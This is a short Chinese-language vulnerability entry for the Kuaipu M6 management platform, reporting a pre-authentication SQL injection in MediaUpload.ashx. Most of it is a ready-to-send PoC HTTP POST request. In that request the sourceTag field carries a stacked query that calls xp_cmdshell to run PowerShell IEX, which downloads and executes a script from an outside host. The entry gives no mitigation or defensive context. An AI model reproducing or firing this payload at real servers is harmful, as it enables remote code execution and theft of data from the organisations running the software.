漏洞描述
快普M6是国内好真正意义上的整合管理平台,快普必将成为信息化管理软件的航空母舰,开创管理软件新纪元。 快普M6 MediaUpload处存在前台SQL注入漏洞,获取到数据库内敏感信息。
快普M6 MediaUpload处存在前台SQL注入漏洞
PoC代码
POST /ashx/Common/MediaUpload.ashx HTTP/1.1
Host:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Length: 164
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/[REDACTED] Safari/537.36
upload=check&dasdsa=1&sourceTag=11');exec master..xp_cmdshell "sqlps IEX ((new-object net.webclient).downloadstring('http://[REDACTED]/yEpPP'))"--&field=1